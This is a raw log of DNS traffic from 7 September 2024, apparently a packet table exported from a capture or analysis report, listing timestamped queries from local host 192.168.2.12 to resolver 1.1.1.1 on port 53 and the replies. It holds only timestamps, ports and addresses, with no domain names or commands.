                                                                                                                                                                    Sep 7, 2024 15:35:41.349607944 CEST53601541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:41.464982986 CEST5957453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:41.477961063 CEST53595741.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:42.103144884 CEST5493353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:42.112425089 CEST53549331.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:42.728231907 CEST5264453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:42.993511915 CEST5264453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:43.005251884 CEST53526441.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.005291939 CEST53526441.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.118833065 CEST5064853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:43.138386011 CEST53506481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.244333982 CEST5496753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:43.255650997 CEST53549671.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.371757984 CEST5448353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:43.390953064 CEST53544831.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:43.994155884 CEST5306753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:44.014983892 CEST53530671.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:44.634356976 CEST6240553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:44.802185059 CEST53624051.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:44.944983959 CEST5128653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:44.955146074 CEST53512861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:45.072033882 CEST5756153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:45.170308113 CEST53575611.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:45.276259899 CEST6141353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:45.447295904 CEST53614131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:45.558948040 CEST5177753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:45.806423903 CEST5177753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:45.816993952 CEST53517771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:46.059808016 CEST53517771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:46.760076046 CEST5891953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:46.944902897 CEST53589191.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:47.056442976 CEST6184553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:47.068275928 CEST53618451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:47.181288958 CEST5414953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:47.431282997 CEST5414953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:47.438071012 CEST53541491.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:48.017987967 CEST53541491.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:48.743702888 CEST5500453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:48.779782057 CEST53550041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:48.884751081 CEST5598753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:49.024524927 CEST53559871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.150202036 CEST6243753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:49.171744108 CEST53624371.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.275316000 CEST5213753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:49.284931898 CEST53521371.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.400343895 CEST5263153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:49.497024059 CEST53526311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.603820086 CEST5107553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:49.662041903 CEST53510751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.775298119 CEST6464153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:49.784840107 CEST53646411.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.806227922 CEST4939453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:49.834145069 CEST53493941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:49.946973085 CEST4962653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:49.960566998 CEST53496261.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:50.071795940 CEST6363153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:50.081816912 CEST53636311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:50.197386026 CEST5446853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:50.371030092 CEST53544681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:50.478877068 CEST6013653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:50.520375013 CEST53601361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:50.635929108 CEST5917553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:50.806104898 CEST53591751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:50.916297913 CEST5813053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:50.925467968 CEST53581301.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.040560961 CEST5048153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:51.049607992 CEST53504811.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.166335106 CEST5842953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:51.176476955 CEST53584291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.290633917 CEST6069153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:51.299865007 CEST53606911.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.401626110 CEST5397353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:51.411427975 CEST53539731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.525007963 CEST5971053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:51.559519053 CEST53597101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.681396961 CEST5815153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:51.690845013 CEST53581511.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.791438103 CEST6464953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:51.803225994 CEST53646491.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:51.915570021 CEST6047853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:51.925779104 CEST53604781.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:52.056229115 CEST5883653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:52.296068907 CEST53588361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:52.400233030 CEST5792953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:52.432729006 CEST53579291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:52.542329073 CEST5730453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:52.725739002 CEST53573041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:52.844832897 CEST5672953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:52.877584934 CEST53567291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:52.978092909 CEST5261653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:52.987941027 CEST53526161.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:53.120228052 CEST6178453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:53.155164003 CEST53617841.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:53.274991035 CEST5895653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:53.513514996 CEST53589561.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:53.634347916 CEST5039953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:53.652153969 CEST53503991.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:53.760731936 CEST5506553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:53.773226976 CEST53550651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:53.914078951 CEST5993753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:54.153160095 CEST5993753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:54.159857988 CEST53599371.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:54.415183067 CEST53599371.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:55.478205919 CEST5613053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:55.488085985 CEST53561301.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:55.587601900 CEST4964853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:55.622739077 CEST53496481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:55.730093002 CEST5013253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:55.768786907 CEST53501321.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:55.775269985 CEST5044353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:55.782427073 CEST53504431.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:55.884654999 CEST5823953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:55.960949898 CEST53582391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:56.057131052 CEST6366853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:56.073976994 CEST53636681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:56.183131933 CEST6535453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:56.199596882 CEST53653541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:56.310973883 CEST5153953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:56.518556118 CEST53515391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:56.618885040 CEST5582653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:56.664932966 CEST53558261.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:56.776949883 CEST5403953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:56.785847902 CEST53540391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:56.886908054 CEST5736053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:56.896509886 CEST53573601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:57.024210930 CEST6374553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:57.070830107 CEST53637451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:57.165712118 CEST5943853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:57.183542013 CEST53594381.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:57.290833950 CEST5665553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:57.508956909 CEST53566551.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:57.605288029 CEST6481653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:57.637502909 CEST53648161.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:57.743746042 CEST5950753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:57.916627884 CEST53595071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:58.009339094 CEST6019253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:58.039417982 CEST53601921.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:58.149992943 CEST6223453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:58.415174007 CEST6223453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:58.437755108 CEST53622341.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:58.437789917 CEST53622341.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:58.540618896 CEST6197653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:58.638709068 CEST53619761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:58.743705034 CEST6542353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:58.912971973 CEST53654231.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:59.009560108 CEST6348853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:59.031893969 CEST53634881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:59.137320995 CEST6502453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:59.384094000 CEST6502453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:59.407332897 CEST53650241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:59.407346010 CEST53650241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:59.509807110 CEST5208553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:59.524020910 CEST53520851.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:59.634335995 CEST5268853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:59.899585962 CEST5268853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:35:59.961214066 CEST53526881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:35:59.961276054 CEST53526881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.056437969 CEST5066153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:00.086376905 CEST53506611.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.181278944 CEST5832653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:00.190593958 CEST53583261.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.290657043 CEST6266053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:00.453735113 CEST53626601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.556337118 CEST5176253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:00.565785885 CEST53517621.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.666702032 CEST5722253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:00.676542044 CEST53572221.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.684715033 CEST4931653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:00.701144934 CEST53493161.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:00.790605068 CEST6287353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:00.995229959 CEST53628731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:01.088345051 CEST6081253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:01.098546982 CEST53608121.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:01.197067976 CEST5257053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:01.494579077 CEST5257053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:01.522591114 CEST53525701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:01.522612095 CEST53525701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:01.618820906 CEST5034553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:01.874218941 CEST53503451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:01.963253021 CEST5259153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:01.990295887 CEST53525911.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.103390932 CEST5978753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:02.276124001 CEST53597871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.369342089 CEST6344253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:02.379555941 CEST53634421.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.478142977 CEST5422653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:02.513186932 CEST53542261.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.605041981 CEST6342553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:02.640221119 CEST53634251.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.731384039 CEST5088253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:02.740567923 CEST53508821.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.838296890 CEST5724053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:02.849616051 CEST53572401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:02.947529078 CEST5573953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:02.956248045 CEST53557391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.041330099 CEST5078853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:03.290534019 CEST5078853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:03.366449118 CEST53507881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.366466999 CEST53507881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.469635010 CEST6502453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:03.488667011 CEST53650241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.587584972 CEST6485253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:03.597775936 CEST53648521.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.696913958 CEST4927153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:03.706434011 CEST53492711.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.806268930 CEST4946353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:03.839586020 CEST53494631.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:03.931376934 CEST5418753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:03.978329897 CEST53541871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:04.072208881 CEST5982153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:04.091533899 CEST53598211.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:04.181328058 CEST5472053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:04.201440096 CEST53547201.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:04.290735006 CEST5621353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:04.558609962 CEST5621353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:04.794929981 CEST53562131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:04.794959068 CEST53562131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:04.888252020 CEST6279253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:04.899945974 CEST53627921.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:04.994599104 CEST5978853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:05.014185905 CEST53597881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:05.118722916 CEST6004453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:05.154861927 CEST53600441.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:05.244666100 CEST5014453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:05.424164057 CEST53501441.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:05.513262033 CEST5717353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:05.521946907 CEST53571731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:05.618994951 CEST4941353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:05.791969061 CEST53494131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:05.884439945 CEST5353053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:06.063714027 CEST53535301.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.150609970 CEST6071053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:06.159555912 CEST53607101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.181210995 CEST5806753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:06.191253901 CEST53580671.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.274976015 CEST6484253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:06.452656031 CEST53648421.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.541208029 CEST5270953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:06.551464081 CEST53527091.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.635210991 CEST5499053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:06.655798912 CEST53549901.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.743679047 CEST5657453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:06.774971008 CEST53565741.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.853805065 CEST6330153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:06.871201038 CEST53633011.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:06.962532043 CEST5912553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:06.971868992 CEST53591251.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:07.056202888 CEST5526553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:07.098696947 CEST53552651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:07.183248997 CEST5248353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:07.191869974 CEST53524831.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:07.278106928 CEST5556953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:07.287311077 CEST53555691.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:07.384427071 CEST6333153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:07.627218962 CEST53633311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:07.712796926 CEST6005453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:07.730355978 CEST53600541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:07.821871042 CEST5470853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:07.839298010 CEST53547081.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:07.916085005 CEST5028053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:07.926170111 CEST53502801.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:08.009385109 CEST5563953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:08.018513918 CEST53556391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:08.103487015 CEST5873553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:08.176335096 CEST53587351.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:08.260759115 CEST5567653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:08.442809105 CEST53556761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:08.525111914 CEST5512453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:08.708883047 CEST53551241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:08.790656090 CEST5614953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:08.822208881 CEST53561491.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:08.900449991 CEST6444653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:08.909357071 CEST53644461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:09.009368896 CEST6124653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:09.181090117 CEST53612461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:09.260302067 CEST6074753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:09.358445883 CEST53607471.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:09.447712898 CEST5251453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:09.467022896 CEST53525141.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:09.556279898 CEST5500653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:09.591922998 CEST53550061.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:09.695828915 CEST5790653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:09.705466986 CEST53579061.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:09.806374073 CEST6005253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:10.055910110 CEST6005253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:10.306972027 CEST53600521.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:10.306989908 CEST53600521.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:10.384955883 CEST6001153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:10.406570911 CEST53600111.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:10.493974924 CEST5976053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:10.670713902 CEST53597601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:10.743716002 CEST5979153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:10.912091970 CEST53597911.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:10.994261026 CEST6025653192.168.2.121.1.1.1
